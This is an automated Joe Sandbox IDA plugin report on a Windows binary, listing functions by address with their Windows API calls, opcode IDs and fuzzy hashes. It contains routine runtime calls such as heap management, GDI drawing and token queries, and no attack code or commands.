Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 47941e3402b1214254495489274081a40de8ed699d7c1e8b7ca8c0b2ac4962a2
Instruction ID: f1b2bf24d94dab7ab123ab0cf198838a16565d43b5cc0a221cdb77e88f9bce99
Opcode Fuzzy Hash: 47941e3402b1214254495489274081a40de8ed699d7c1e8b7ca8c0b2ac4962a2
Instruction Fuzzy Hash: 2021A175600204AFD704EF66DA84AAEBBE5EF44704F00843EE84AD7362DB74AC44CB94

Function 0049CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0049CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0049CDE9

Part of subcall function 00493820: RtlAllocateHeap.NTDLL(00000000,?,00531444,?,0047FDF5,?,?,0046A976,00000010,00531440,004613FC,?,004613C6,?,00461129), ref: 00493852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0049CE0F
_free.LIBCMT ref: 0049CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0049CE31

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 769fa9df7cf8864c33a6b1fe2cb9c91f8ce5892028c68bbf7e0de7bbf3fa26f7
Instruction ID: 1ca15b5b0b13e7eb5dca059a4ada14a827cd8619f6bc3f62a17d41514d9c65fe
Opcode Fuzzy Hash: 769fa9df7cf8864c33a6b1fe2cb9c91f8ce5892028c68bbf7e0de7bbf3fa26f7
Instruction Fuzzy Hash: FB01D4726012157F2F215AB66DC8C7B6D6DDEC6BA1315023FFD06C7200EA688D12C2F9

Function 00479639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00479693
SelectObject.GDI32(?,00000000), ref: 004796A2
BeginPath.GDI32(?), ref: 004796B9
SelectObject.GDI32(?,00000000), ref: 004796E2

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 2c074f6e1a6d9a7d7ad820e6f83db3cfc1f4ccfab8fc1e41a5196f8c3dc2ac30
Instruction ID: 9896bded84f328a705c59597b9c721ff83912f5e097ae4e4fa5215772420220f
Opcode Fuzzy Hash: 2c074f6e1a6d9a7d7ad820e6f83db3cfc1f4ccfab8fc1e41a5196f8c3dc2ac30
Instruction Fuzzy Hash: 0F217132802709EFDB119F74DD447EA3BA4BB60725F104316F414A62A0D3789C59DF9C

Function 004C5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 004C5726
_memcmp.LIBVCRUNTIME ref: 004C5744
_memcmp.LIBVCRUNTIME ref: 004C5757
_memcmp.LIBVCRUNTIME ref: 004C576F
_memcmp.LIBVCRUNTIME ref: 004C5787

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 9e7421acf418962ec495fe46efd9f407a850a4f890f18b51d814774ce928152d
Instruction ID: 0ad6f0110abcde6794ed3a14728040746553d34f3bfe0ffb608be1a23a2b5ab1
Opcode Fuzzy Hash: 9e7421acf418962ec495fe46efd9f407a850a4f890f18b51d814774ce928152d
Instruction Fuzzy Hash: 1701F969242609BBE20866119D42FBF735C9F21398F10003BFE049A641F72CFDD583AD

Function 00492DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0048F2DE,00493863,00531444,?,0047FDF5,?,?,0046A976,00000010,00531440,004613FC,?,004613C6), ref: 00492DFD
_free.LIBCMT ref: 00492E32
_free.LIBCMT ref: 00492E59
SetLastError.KERNEL32(00000000,00461129), ref: 00492E66
SetLastError.KERNEL32(00000000,00461129), ref: 00492E6F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: e2f7ea40064f00607d365c48d89b7fb615dc337fd31f70f5a624f90c6d1dbf2b
Instruction ID: 79ec3877207724f92a4b29d941ff35fdb9f7be585f890f92ce795691273b0fba
Opcode Fuzzy Hash: e2f7ea40064f00607d365c48d89b7fb615dc337fd31f70f5a624f90c6d1dbf2b
Instruction Fuzzy Hash: C501F97264560077CE1267356EC6D2B2E5DAFD23B9B21003FF815A22D3EAEC8C12816C

Function 004C000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004BFF41,80070057,?,?,?,004C035E), ref: 004C002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004BFF41,80070057,?,?), ref: 004C0046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004BFF41,80070057,?,?), ref: 004C0054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004BFF41,80070057,?), ref: 004C0064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004BFF41,80070057,?,?), ref: 004C0070

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: f8bf4d3b0f5e5be0087c4ab543b0d10b4e42ec8b4accfbc88e3a4ad749269656
Instruction ID: a113c29ad715ed280f96aa2d2a14bf595f36abd5f959c2e5b77acc7e04ad7f40
Opcode Fuzzy Hash: f8bf4d3b0f5e5be0087c4ab543b0d10b4e42ec8b4accfbc88e3a4ad749269656
Instruction Fuzzy Hash: E201B87A600208EBDB505F6AEC84FAA7AADEB44792F114029F801E2210E778CD008BA4

Function 004CE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 004CE997
QueryPerformanceFrequency.KERNEL32(?), ref: 004CE9A5
Sleep.KERNEL32(00000000), ref: 004CE9AD
QueryPerformanceCounter.KERNEL32(?), ref: 004CE9B7
Sleep.KERNEL32 ref: 004CE9F3

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: ab7b3a038a01cf88edc3f520f8b3be4a0c47c6ac5f0b978df33d6f2b9c2cabd1
Instruction ID: 665ced8b452c96109f9eb3f84e42c298156961bc92e92ef1b7b7e6cfc7194d61
Opcode Fuzzy Hash: ab7b3a038a01cf88edc3f520f8b3be4a0c47c6ac5f0b978df33d6f2b9c2cabd1
Instruction Fuzzy Hash: 8D016D75C0152DDBCF409FE6DE89AEDBB78FF09300F00055AE502B2240CB389565CBAA

Function 004C10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004C1114
GetLastError.KERNEL32(?,00000000,00000000,?,?,004C0B9B,?,?,?), ref: 004C1120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004C0B9B,?,?,?), ref: 004C112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004C0B9B,?,?,?), ref: 004C1136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004C114D

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 5295cb7b315b00b30e2cb39d0c1f4e3e252c93f790340ec0f553220b5499495b
Instruction ID: 62c2ec4c9e2945ccf01876eb069640db5862829585286536773eeab34895004e
Opcode Fuzzy Hash: 5295cb7b315b00b30e2cb39d0c1f4e3e252c93f790340ec0f553220b5499495b
Instruction Fuzzy Hash: F6016D79100209BFDB115FA4DD89E6B3B6EEF8A3A0B140429FA41C3360DB35DC20CA64

Function 004C0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004C0FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004C0FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004C0FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004C0FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004C1002

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 966d9c97f622e60fb9778264a3ccebf303850ce9a4227728b3b9e9b363e2815f
Instruction ID: 529115e4cc918542da1d0e7013545a52b60f0e0b6b0ba6ada879bffd7a18375e
Opcode Fuzzy Hash: 966d9c97f622e60fb9778264a3ccebf303850ce9a4227728b3b9e9b363e2815f
Instruction Fuzzy Hash: 07F0AF39100305ABD7210FA59D89F673B6DEF8A761F100425F905D6361CA30DC60CA64

Function 004C1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004C102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004C1036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004C1045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004C104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004C1062

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: dc329999c07c5757247c19020323ce53a69978d42af0b1d6e387d654ae9693be
Instruction ID: 7fc4971aa20afaad70590a32f51c8ce62cd57ad10b7147dad9242b69e3cdc3f7
Opcode Fuzzy Hash: dc329999c07c5757247c19020323ce53a69978d42af0b1d6e387d654ae9693be
Instruction Fuzzy Hash: F5F0AF39140305ABD7211FA5ED89F673B6DEF8A761F100425FD05D6361CA30D860CA64

Function 004D030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,004D017D,?,004D32FC,?,00000001,004A2592,?), ref: 004D0324
CloseHandle.KERNEL32(?,?,?,?,004D017D,?,004D32FC,?,00000001,004A2592,?), ref: 004D0331
CloseHandle.KERNEL32(?,?,?,?,004D017D,?,004D32FC,?,00000001,004A2592,?), ref: 004D033E
CloseHandle.KERNEL32(?,?,?,?,004D017D,?,004D32FC,?,00000001,004A2592,?), ref: 004D034B
CloseHandle.KERNEL32(?,?,?,?,004D017D,?,004D32FC,?,00000001,004A2592,?), ref: 004D0358
CloseHandle.KERNEL32(?,?,?,?,004D017D,?,004D32FC,?,00000001,004A2592,?), ref: 004D0365

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1859801b0ac8f71a78f023960ee0c7e3d4c8c35bb16aae71a86c5a7a7e61e4af
Instruction ID: f8484245ec2f543c4312180d3c6f02e797d9f3fbcdec46f04db2539c8a9aa06d
Opcode Fuzzy Hash: 1859801b0ac8f71a78f023960ee0c7e3d4c8c35bb16aae71a86c5a7a7e61e4af
Instruction Fuzzy Hash: 1201EA72800B058FCB30AF66D8A0813FBF9BF603053058A3FD19252A30C3B4A998CF84

Function 0049D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0049D752

Part of subcall function 004929C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0049D7D1,00000000,00000000,00000000,00000000,?,0049D7F8,00000000,00000007,00000000,?,0049DBF5,00000000), ref: 004929DE
Part of subcall function 004929C8: GetLastError.KERNEL32(00000000,?,0049D7D1,00000000,00000000,00000000,00000000,?,0049D7F8,00000000,00000007,00000000,?,0049DBF5,00000000,00000000), ref: 004929F0

_free.LIBCMT ref: 0049D764
_free.LIBCMT ref: 0049D776
_free.LIBCMT ref: 0049D788
_free.LIBCMT ref: 0049D79A

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c0c03ef6563afee12e232cac73f4105c586bfa0671780c407d4a2604afe2c117
Instruction ID: 139d621cdf3a9c6cff0bcbbd7fa572af70b32c42632a22b23ae0a1af97a54ac3
Opcode Fuzzy Hash: c0c03ef6563afee12e232cac73f4105c586bfa0671780c407d4a2604afe2c117
Instruction Fuzzy Hash: 49F0F4B2A442046B8A21EB95FAC5C1B7FDDBF55714794086BF04DD7603C768FC8046A8

Function 004C5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 004C5C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 004C5C6F
MessageBeep.USER32(00000000), ref: 004C5C87
KillTimer.USER32(?,0000040A), ref: 004C5CA3
EndDialog.USER32(?,00000001), ref: 004C5CBD

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 40959deafbadda34abbc6f6e2bb8bfd095c7d8e8af0c3d0d3e8ae548069856b7
Instruction ID: 6053a2ae45b903f9190977c78d1f6396df08bb417308af7dda1a41618b2fb8e6
Opcode Fuzzy Hash: 40959deafbadda34abbc6f6e2bb8bfd095c7d8e8af0c3d0d3e8ae548069856b7
Instruction Fuzzy Hash: 3B018B345007049BFB205B10DE8EFAA77B8BF00B05F00056EA553A10E1DBF47998CA59

Function 004922A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004922BE

Part of subcall function 004929C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0049D7D1,00000000,00000000,00000000,00000000,?,0049D7F8,00000000,00000007,00000000,?,0049DBF5,00000000), ref: 004929DE
Part of subcall function 004929C8: GetLastError.KERNEL32(00000000,?,0049D7D1,00000000,00000000,00000000,00000000,?,0049D7F8,00000000,00000007,00000000,?,0049DBF5,00000000,00000000), ref: 004929F0

_free.LIBCMT ref: 004922D0
_free.LIBCMT ref: 004922E3
_free.LIBCMT ref: 004922F4
_free.LIBCMT ref: 00492305

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fefc35fa87ecbd787419591a711c8f46d9cfa6dff73d3119b691541bed864e21
Instruction ID: c0f9b724da3ef4c552de1b979832be1e5dd0b4e841d58a5f64519da3d197a2fe
Opcode Fuzzy Hash: fefc35fa87ecbd787419591a711c8f46d9cfa6dff73d3119b691541bed864e21
Instruction Fuzzy Hash: 24F030F9500620AB8A22EF65BD0180D3F64BB39750700155BF414D33B2C7780515FBEC

Function 004795C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 004795D4
StrokeAndFillPath.GDI32(?,?,004B71F7,00000000,?,?,?), ref: 004795F0
SelectObject.GDI32(?,00000000), ref: 00479603
DeleteObject.GDI32 ref: 00479616
StrokePath.GDI32(?), ref: 00479631

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 2c8d6615b0e77fc66a11d80b5beae62c5ccb57381d57fbdd450a27e847c4a659
Instruction ID: 1ac6e7b46a045bffcb52b0ac4313cf10355b3a0df65ce57dccb93191aa27aea6
Opcode Fuzzy Hash: 2c8d6615b0e77fc66a11d80b5beae62c5ccb57381d57fbdd450a27e847c4a659
Instruction Fuzzy Hash: 46F0E136006A08EFD7165F65EE5C7B53B65A711332F048325F459552F0CB348969EF2C

Function 00490F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 004910F9
__freea.LIBCMT ref: 00491117

Part of subcall function 00491537: _free.LIBCMT ref: 0049154F

Strings

a/p, xrefs: 004911DE
am/pm, xrefs: 0049117A

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: c576ab7e23a91bd2d9bee5db8011da74a0796a82588002ec1a4972a13d36b26b
Instruction ID: 1eee5403f8f75f2e00265a080e6c5958761ed812e21a3a3177959c2d585003d2
Opcode Fuzzy Hash: c576ab7e23a91bd2d9bee5db8011da74a0796a82588002ec1a4972a13d36b26b
Instruction Fuzzy Hash: 22D1C031A00207DAEF259F68C845ABFBFB0EB05300F14417BE905ABB61D3799D81CB59

Function 004E61D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 00480242: EnterCriticalSection.KERNEL32(0053070C,00531884,?,?,0047198B,00532518,?,?,?,004612F9,00000000), ref: 0048024D
Part of subcall function 00480242: LeaveCriticalSection.KERNEL32(0053070C,?,0047198B,00532518,?,?,?,004612F9,00000000), ref: 0048028A

Part of subcall function 004800A3: __onexit.LIBCMT ref: 004800A9

__Init_thread_footer.LIBCMT ref: 004E6238

Part of subcall function 004801F8: EnterCriticalSection.KERNEL32(0053070C,?,?,00478747,00532514), ref: 00480202
Part of subcall function 004801F8: LeaveCriticalSection.KERNEL32(0053070C,?,00478747,00532514), ref: 00480235

Part of subcall function 004D359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 004D35E4
Part of subcall function 004D359C: LoadStringW.USER32(00532390,?,00000FFF,?), ref: 004D360A

Strings

x#S, xrefs: 004E633A
x#S, xrefs: 004E6353
x#S, xrefs: 004E636F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

